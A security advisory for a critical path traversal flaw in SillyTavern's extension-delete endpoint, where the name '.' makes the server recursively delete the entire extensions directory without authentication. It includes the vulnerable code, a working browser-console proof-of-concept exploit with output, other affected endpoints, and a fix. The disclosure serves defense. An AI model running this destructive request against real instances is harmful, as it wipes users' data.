SillyTavern has a Path Traversal issue
GHSA-886q-f44j-h6wh · CVE-2026-44650
Published · Modified
Description
Summary
POST /api/extensions/delete endpoint accepts extensionName: "." which bypassessanitize-filename validation, causing the entire user extensions directory to be
recursively deleted. No authentication is required in the default configuration.
Affected File
src/endpoints/extensions.js (last modified: commit 3ad9b05e2)
Root Cause
The validation check occurs before sanitization:
// [1] "." is truthy — passes the check
if (!request.body.extensionName) {
return response.status(400).send('Bad Request');
}
// [2] sanitize(".") → ""
const extensionPath = path.join(basePath, sanitize(extensionName));
// path.join("data\\default-user\\extensions", "")
// = "data\\default-user\\extensions" ← basePath itself!
// [3] Deletes the entire extensions directory
await fs.promises.rm(extensionPath, { recursive: true });
sanitize-filename converts "." to "" (documented behavior).path.join(basePath, "") returns basePath itself.
Result: the entire data\default-user\extensions\ directory is deleted.
Proof of Concept
Tested on: Windows 10, SillyTavern v1.17.0, commit 004f1336e
Authentication: none (basicAuthMode: false, default configuration)
Run in browser console (F12) while SillyTavern is open:
async function poc() {
const { token } = await (await fetch('/csrf-token')).json();
const headers = {
'Content-Type': 'application/json',
'X-CSRF-Token': token,
};
// Before: 1 extension installed
const before = await (await fetch('/api/extensions/discover', { headers })).json();
console.log('Before:', before.filter(e => e.type === 'local'));
// [{ type: 'local', name: 'third-party/Extension-Notebook' }]
// Attack
const res = await fetch('/api/extensions/delete', {
method: 'POST',
headers,
body: JSON.stringify({ extensionName: '.' }),
});
console.log('Status:', res.status); // 200
console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions"
// After: empty
const after = await (await fetch('/api/extensions/discover', { headers })).json();
console.log('After:', after.filter(e => e.type === 'local'));
// []
}
poc();
Result:
Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }]
Status: 200
Body: Extension has been deleted at data\default-user\extensions
After: []
Impact
- No authentication required (
basicAuthMode: falseby default).
Any user with network access to the SillyTavern instance can permanently
delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost.
- With
global: trueand admin privileges, the global extensions directory
shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to
enable unauthenticated remote exploitation from a malicious website.
Same Pattern in Other Endpoints
The same vulnerability exists in:
POST /api/extensions/updatePOST /api/extensions/versionPOST /api/extensions/branchesPOST /api/extensions/switch
Suggested Fix
const sanitized = sanitize(extensionName);
// Check AFTER sanitizing
if (!sanitized) {
return response.status(400).send('Bad Request: Invalid extension name.');
}
const extensionPath = path.join(basePath, sanitized);
// Additional path traversal guard
const resolvedPath = path.resolve(extensionPath);
const resolvedBase = path.resolve(basePath);
if (!resolvedPath.startsWith(resolvedBase + path.sep)) {
return response.status(400).send('Bad Request: Invalid extension path.');
}
Apply the same fix to /update, /version, /branches, and /switch endpoints.
References
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical)
- sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename
- Related CVE (same project): CVE-2025-59159
##REPORTED BY
Jormungandr
Ready to move
Start Securing
Free, no credit card | First findings in minutes